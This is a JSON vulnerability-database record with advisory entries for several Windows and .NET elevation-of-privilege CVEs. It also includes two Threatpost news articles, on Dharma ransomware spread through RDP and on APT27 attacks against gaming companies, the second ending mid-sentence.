{"redhatcve": [{"lastseen": "2022-07-07T17:40:24", "description": "An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.The update addresses the vulnerability by correcting how .NET Framework activates COM objects., aka '.NET Framework Elevation of Privilege Vulnerability'.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-29T09:20:54", "type": "redhatcve", "title": "CVE-2020-1066", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066"], "modified": "2022-07-07T12:24:31", "id": "RH:CVE-2020-1066", "href": "https://access.redhat.com/security/cve/cve-2020-1066", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:59:35", "description": "An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.The update addresses the vulnerability by correcting how .NET Framework activates COM objects., aka '.NET Framework Elevation of Privilege Vulnerability'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T23:15:00", "type": "cve", "title": "CVE-2020-1066", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:3.0"], "id": "CVE-2020-1066", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1066", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-13T16:00:32", "description": "An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-12T16:15:00", "type": "cve", "title": "CVE-2020-0787", "cwe": ["CWE-269", "CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2020-0787", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0787", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:36", "description": "Windows COM in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when Windows fails to properly validate input before loading type libraries, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0213.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0214", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0214", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0214", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:35", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0214.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0213", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}], "mscve": [{"lastseen": "2021-12-06T18:25:11", "description": "An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.\n\nThe update addresses the vulnerability by correcting how .NET Framework activates COM objects.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mscve", "title": ".NET Framework Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066"], "modified": "2020-05-14T07:00:00", "id": "MS:CVE-2020-1066", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1066", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege exists in Windows COM Aggregate Marshaler. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.\n\nTo exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running.\n\nThe update addresses the vulnerability by correcting how Windows COM Marshaler processes interface requests.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows COM Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-09-12T07:00:00", "id": "MS:CVE-2017-0213", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-06T18:25:12", "description": "An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe security update addresses the vulnerability by correcting how Windows BITS handles symbolic links.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-10T07:00:00", "type": "mscve", "title": "Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2020-03-10T07:00:00", "id": "MS:CVE-2020-0787", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-08-24T21:45:54", "description": "A group of \u2018script kiddies\u2019 tied to Iran are targeting companies worldwide with internet-facing Remote Desktop Protocol (RDP) ports and weak credentials in order to infect them with Dharma ransomware.\n\nThe [Dharma malware](<https://threatpost.com/keys-for-dharma-ransomware-released/124024/>) (also known as Crysis) [has been distributed](<https://threatpost.com/next-gen-ransomware-packs-a-human-punch-microsoft-warns/153501/>) as a ransomware-as-a-service (RaaS) model since at least 2016. While the ransomware was previously used by advance persistent threat (APT) actors, its source code surfaced in March 2020, making it available to a wider breadth of attackers. That is the case with this latest Iran-linked threat group, which researchers say is unsophisticated and has been targeting companies across Russia, Japan, China and India with the ransomware since June.\n\n\u201cThe fact Dharma source code has been made widely available led to the increase in the number of operators deploying it,\u201d Oleg Skulkin, senior digital forensics specialist with Group-IB, said [in an analysis](<https://www.group-ib.com/media/iran-cybercriminals/>) of the attacks posted Monday. \u201cIt\u2019s surprising that Dharma landed in the hands of Iranian script kiddies who used it for financial gain, as Iran has traditionally been a land of state-sponsored attackers engaged in espionage and sabotage. Despite that these cybercriminals use quite common tactics, techniques and procedures they have been quite effective.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe threat actors are unsophisticated because they use publicly available tools both to obtain initial access and move laterally \u2013 rather than using custom malware or post-exploitation frameworks, Group-IB senior DFIR analyst Oleg Skulkin told Threatpost.\n\n\u201cThe threat actors use Persian language for Google searches on compromised servers and download tools from Iran-linked Telegram groups,\u201d Skulkin told Threatpost. \u201cIn addition, Group-IB experts saw the threat actors\u2019 attempt to brute-force accounts on an Iranian video streaming service.\u201d\n\nThe attackers in this campaign first would scan ranges of IPs for hosts that contained these vulnerable RDP ports and weak credentials, researchers said. They did so using scanning software called Masscan (which has previously been utilized by [bad actors like Fxmsp](<https://threatpost.com/notorious-hacker-fxmsp-outed/157275/>)).\n\nOnce vulnerable hosts were identified, the attackers deployed [a well-known RDP](<https://www.wilbursecurity.com/2019/10/rdp-honeypotting/>) brute force application called NLBrute, which has been sold on forums for years. Using this tool, they were able to brute-force their way into the system, and then check the validity of obtained credentials on other accessible hosts in the network.\n\nIn some attacks, attackers also attempted to elevate privileges using an exploit for an elevation privilege flaw. This medium-severity flaw ([CVE-2017-0213](<https://nvd.nist.gov/vuln/detail/CVE-2017-0213>)), which affects Windows systems, can be exploited when an attacker runs a specially crafted application.\n\nPost compromise, \u201cinterestingly, the threat actors likely didn\u2019t have a clear plan on what to do with the compromised networks,\u201d said researchers, showing their lack of sophistication. In different attacks, attackers would download various publicly-available tools to perform reconnaissance or move laterally across the network.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/24102642/table-1%40x.jpg>)To scan for accessible hosts in the compromised network, for instance, they used publicly-available tool Advanced Port Scanner. Other tools were downloaded by the attackers from Persian-language Telegram channels, researchers said.\n\n\u201cFor instance, to disable built-in antivirus software, the attackers used Defender Control and Your Uninstaller,\u201d said researchers. \u201cThe latter was downloaded from Iranian software sharing website \u2014 the Google search query in Persian language \u201c\u062f\u0627\u0646\u0644\u0648\u062f \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 youre unistaller\u201d was discovered in the Chrome artifacts.\u201d\n\nAttackers would then move laterally across the network and deploy the Dharma variant executable, encrypt data, and leave a ransom note for the victim. Researchers said, hackers typically demanded a ransom between 1 to 5 BTC (worth between 12,000 to 59,000 USD at the time of writing).\n\nResearchers said, though the exact number of victims in this campaign is unknown, the discovered forensic artifacts revealed a that the threat actors in this campaigb are \u201cfar behind the level of sophistication of big league Iranian APTs.\u201d\n\n\u201cThe newly discovered hacker group suggests that Iran, which has been known as a cradle of state-sponsored APT groups for years, now also accommodates financially motivated cybercriminals,\u201d according to Group-IB researchers.\n\nResearchers said part of this change may be attributed to the pandemic exposing a number of vulnerable hosts \u2013 with many employees working remotely \u2013 making an extremely popular attack vector for cybercriminals. Therefore, the default RDP port 3389 should be closed if not in use, they suggested.\n\n\u201cAs the attackers usually need several attempts to brute force passwords and gain access to the RDP, it is important to enable account lockout policies by limiting the number of failed login attempts per user,\u201d said researchers.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-24T15:23:37", "type": "threatpost", "title": "Iran-Linked 'Newbie' Hackers Spread Dharma Ransomware Via RDP Ports", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2020-08-24T15:23:37", "id": "THREATPOST:22AA852BEEA43B18D4341D7ADA922536", "href": "https://threatpost.com/iran-linked-newbie-hackers-spread-dharma-ransomware-via-rdp-ports/158580/", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-06T21:58:42", "description": "A recent slew of related ransomware attacks on top videogame companies has been associated with the notorious Chinese-linked APT27 threat group, suggesting that the advanced persistent threat (APT) is swapping up its historically espionage centralized tactics to adopt ransomware, a new report says.\n\nResearchers noticed the \u201cstrong links\u201d to APT27 when they were brought in as part of incident response for ransomware activity that affected several major gaming companies globally last year as part of a supply-chain attack. Details of these incidents (including specific company names and the timeline) are scant. However, while researchers told Threatpost that they could not name the specific gaming companies attacked, they said that five companies were affected. What\u2019s more, two of the affected companies are \u201camong the largest in the world,\u201d they said.\n\nAPT27 (also known as Bronze Union, LuckyMouse, and Emissary Panda), [is believed to operate from the People\u2019s Republic of China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>) and has been around since 2013, researchers said. The group has historically leveraged publicly available tools to access networks with an aim of collecting political and military intelligence. And, it\u2019s previously been focused on cyberespionage and data theft, rather than monetary profit.\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\n\u201cPreviously, APT27 was not necessarily focused on financial gain, and so employing ransomware-actor tactics is highly unusual. However this incident occurred at a time where COVID-19 was rampant across China, with lockdowns being put into place, and therefore a switch to a financial focus would not be surprising,\u201d according to researchers with Profero and Security Joes, [in a joint Monday analysis](<https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf>) [PDF].\n\n## **The Supply-Chain Attack**\n\nThe initial infection vector for the attack was through a third-party service provider, that had been previously infected through another third-party service provider, researchers said.\n\nUpon further investigation into the security incident, researchers discovered malware samples linked to a campaign from the beginning of 2020, [called DRBControl](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia>). Trend Micro researchers who previously discovered this campaign campaign noted that it had links to APT27 and the [Winnti supply-chain specialist gang](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>). The hallmarks of the DRBControl backdoor attack was that it hit gambling companies, and used Dropbox for command-and-control (C2) communications.\n\nProfero and Security Joes researchers discovered a \u201cvery similar sample\u201d of DRBControl in the more recent campaign (which they dubbed the \u201cClambling\u201d sample) \u2013 though this variant lacked the Dropbox capabilities.\n\nResearchers found that DRBControl \u2013 as well as a PlugX sample \u2013 was then loaded into memory using a Google Updater executable, which was vulnerable to DLL side-loading (side-loading is the process of using a malicious DLL to spoof a legitimate one, and then relying on legitimate Windows executables to execute the malicious code). Both samples used the signed Google Updater, and both DLLs were labeled goopdate.dll, researchers said.\n\n\u201cFor each of the two samples, there was a legitimate executable, a malicious DLL and a binary file consisting of shellcode responsible for extracting the payload from itself and running it in memory,\u201d said researchers.\n\nAfter the threat actors gained a foothold onto the company systems through the third-party compromise, an ASPXSpy webshell was deployed, to assist in lateral movement.\n\nAnother process that stood out in this incident was the encryption of core servers using BitLocker, which is a drive encryption tool built into Windows, said researchers.\n\n\u201cThis was particularly interesting, as in many cases threat actors will drop ransomware to the machines, rather than use local tools,\u201d they said.\n\n## **APT27 Clues **\n\nResearchers observed \u201cextremely strong links\u201d to APT27 in terms of code similarities, and tactics, techniques and procedures (TTPs).\n\nResearchers for instance said that they found similarities between the DRBControl sample and older confirmed APT27 implants. In addition, a modified version of the ASPXSpy webshell used in the campaign was previously seen in APT27-attributed cyberattacks. And, alongside the discovered backdoor, researchers also found a binary responsible for escalating privileges by exploiting CVE-2017-0213, a[ Microsoft Windows Server vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-0213>) that APT27 has used before.\n\n\u201cAPT27 has been known to use this exploit to escalate privileges in the past; with one incident resulting in a cryptominer being dropped to the system,\u201d said researchers.\n\nBeyond the arsenal of tools matching up to previous APT27 operations, researchers noted code similarities with previous APT27 campaigns; and, the domains used in this operation were matched to other operations linked to APT27 previously, Omri Segev Moyal, CEO of Profero, told Threatpost.\n\nResearchers also pointed to similarities in various processes used within the attack that link back to previous APT27 attacks, including the group\u2019s method of using the number of arguments to execute different functions, and the usage of DLL side-loading with the main payload stored in a separate file.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** Is your company\u2019s software supply-chains prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost 